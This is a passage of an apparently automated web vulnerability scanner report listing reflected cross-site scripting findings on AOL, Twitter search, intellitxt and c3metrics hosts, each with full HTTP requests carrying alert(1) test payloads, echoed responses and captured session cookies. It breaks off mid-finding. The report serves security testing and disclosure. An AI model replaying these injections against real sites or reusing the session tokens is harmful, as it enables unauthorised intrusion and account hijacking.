Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:53:58 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:53:57 GMT; path=/
Keep-Alive: timeout=5, max=999936
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 62994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
inkInternalFilters="javascript:,portalblog.aol.com";
s_265.mmxgo = true;
s_265.prop1="Portalblog";
s_265.prop2="Post";
s_265.prop12="http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/?ba9f0"-alert(1)-"394da22382f=1";
s_265.prop16="AOL Across the Web & Beyond - AOL.com Blog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="";
s_265.prop22="275";
s_265.prop9="bsd:19820106";

...[SNIP]...

5.157. http://realestate.aol.com/blog/rental-listings [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://realestate.aol.com
Path:	/blog/rental-listings

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c8d9"><a>bf6814ac77d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/rental-listings2c8d9"><a>bf6814ac77d HTTP/1.1
Host: realestate.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=D3ADC406715086AF88306DB70AF4855B; userNum=61; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:54:08 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_205_188_91_40=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:54:08 GMT; path=/
Keep-Alive: timeout=5, max=999982
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 53741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--PLUGIN NOTICE: Cache Key: 675-get_plugin(8423d27ca021655eabba0420743610a5)
...[SNIP]...
<link rel="canonical" href="http://realestate.aol.com/blog/rental-listings2c8d9"><a>bf6814ac77d" />
...[SNIP]...

5.158. http://search.twitter.com/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 5f288<script>alert(1)</script>cc11d4ec8c3 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=cool+filter%3Alinks5f288<script>alert(1)</script>cc11d4ec8c3&refresh=true&since_id=66122524215349250 HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://search.twitter.com/search?q=cool+filter%3Alinks
X-Prototype-Version: 1.6.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utmz=110314503.1304617781.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.5.10.1304617828; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; _search_twitter_sess=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%0ASGFzaHsABjoKQHVzZWR7AA%3D%3D--105f4e06b6532a8b5e836f918bea0ef4c38e03fe; __utmv=; __utma=110314503.157873429.1304617781.1304617781.1304617781.1; __utmc=110314503; __utmb=110314503.9.10.1304617781

Response

HTTP/1.1 403 Forbidden
Date: Thu, 05 May 2011 12:50:53 GMT
Server: hi
Status: 403 Forbidden
X-Served-From: smf1-aek-19-sr4
Content-Type: application/json; charset=utf-8
X-Served-By: smf1-ada-11-sr4.prod.twitter.com
Cache-Control: max-age=15, must-revalidate, max-age=300
Expires: Thu, 05 May 2011 12:55:53 GMT
X-Varnish: 1936803395
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-ada-11-sr4.prod.twitter.com
X-Cache: MISS
Vary: Accept-Encoding
Connection: close
Content-Length: 78

{"error":"Unknown filter type links5f288<script>alert(1)</script>cc11d4ec8c3"}

5.159. http://sportingnews.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sportingnews.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb89a'-alert(1)-'cabf748942d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /intellitxt/front.asp?ipid=19980&bb89a'-alert(1)-'cabf748942d=1 HTTP/1.1
Host: sportingnews.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7MAEAAAEvnbJjpwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvakeuAA-; Domain=.intellitxt.com; Expires=Mon, 04-Jul-2011 00:57:47 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvakeuAA-; Domain=.intellitxt.com; Expires=Mon, 04-Jul-2011 00:57:47 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:57:47 GMT
Age: 0
Connection: keep-alive
Content-Length: 11737

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://sportingnews.us.intellitxt.com';$iTXT.js.pageQuery='ipid=19980&bb89a'-alert(1)-'cabf748942d=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

5.160. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload bc161<script>alert(1)</script>3a2ecd92a0e was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480bc161<script>alert(1)</script>3a2ecd92a0e&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480bc161<script>alert(1)</script>3a2ecd92a0e-SM=aol_05-05-2011-00-57-11; expires=Sun, 08-May-2011 00:57:11 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480bc161<script>alert(1)</script>3a2ecd92a0e-VT=aol_05-05-2011-00-57-11_17328168321304557031; expires=Tue, 03-May-2016 00:57:11 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480bc161<script>alert(1)</script>3a2ecd92a0e-nUID=aol_17328168321304557031; expires=Thu, 05-May-2011 01:12:11 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
lVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='aol';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480bc161<script>alert(1)</script>3a2ecd92a0e';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17328168321304557031';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv=
...[SNIP]...

5.161. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 44f1f<script>alert(1)</script>ade769199ec was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol44f1f<script>alert(1)</script>ade769199ec&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:09 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:09 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol44f1f%3Cscript%3Ealert%281%29%3C%2Fscript%3Eade769199ec_05-05-2011-00-57-09_16502424161304557029; expires=Tue, 03-May-2016 00:57:09 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol44f1f%3Cscript%3Ealert%281%29%3C%2Fscript%3Eade769199ec_16502424161304557029; expires=Thu, 05-May-2011 01:12:09 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
lVar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='aol44f1f<script>alert(1)</script>ade769199ec';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='165024241613045
...[SNIP]...

5.162. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1ec5<script>alert(1)</script>4b011804435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72&rv=&uid=/c1ec5<script>alert(1)</script>4b011804435&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:17 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:17 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-17_18354599811304557037; expires=Tue, 03-May-2016 00:57:17 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_18354599811304557037; expires=Thu, 05-May-2011 01:12:17 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='18354599811304557037';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/c1ec5<script>alert(1)</script>4b011804435';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.163. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 486cc<script>alert(1)</script>6c5dd41fd57 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72&rv=486cc<script>alert(1)</script>6c5dd41fd57&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-13_3510636931304557033; expires=Tue, 03-May-2016 00:57:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_3510636931304557033; expires=Thu, 05-May-2011 01:12:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6696
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='3510636931304557033';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='486cc<script>alert(1)</script>6c5dd41fd57';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.164. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload b5d7b<script>alert(1)</script>cb4c8ceae8d was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72b5d7b<script>alert(1)</script>cb4c8ceae8d&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-13_8327244281304557033; expires=Tue, 03-May-2016 00:57:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_8327244281304557033; expires=Thu, 05-May-2011 01:12:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6697
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8327244281304557033';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72b5d7b<script>alert(1)</script>cb4c8ceae8d';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.165. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 19842<script>alert(1)</script>d909d40b397 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72&rv=&uid=19842<script>alert(1)</script>d909d40b397&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-14_15133110431304557034; expires=Tue, 03-May-2016 00:57:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_15133110431304557034; expires=Thu, 05-May-2011 01:12:14 GMT; path=/; domain=c3metrics.com
Content-Length: 6677
Connection: close
Content-Type: text/html

